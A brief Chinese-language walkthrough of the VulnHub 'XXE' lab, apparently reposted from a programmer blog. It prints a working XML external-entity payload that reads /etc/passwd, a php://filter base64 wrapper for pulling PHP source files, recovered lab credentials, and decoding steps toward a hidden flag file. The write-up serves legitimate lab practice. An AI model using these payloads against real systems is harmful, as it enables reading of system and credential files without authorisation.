vulnhub-XXE
程序员文章站
2024-03-24 19:12:28
...
目录
下载链接:https://download.vulnhub.com/xxe/XXE.zip
信息探测:netdiscover
访问80端口
存在XXE请求包信息
可以看到用户名密码是通过xml传递给后端的
查看用户名信息 /etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>admin</password></root>
PHP伪协议
php://filter/read=convert.base64-encode/resource=admin.php
base64进行解密
用户名---密码:administhebest ---- aaa@qq.com
/xxe/admin.php
/xxe/flagneout.php
先进行base32 解码,再进行base64解码
或者python
/etc/.flag.php
base64解码:看不懂是啥东西,将返回内容复制保存为php
PHPStudy
将代码保存下来,使用phpstudy 进行访问
上一篇: IDEA中测试类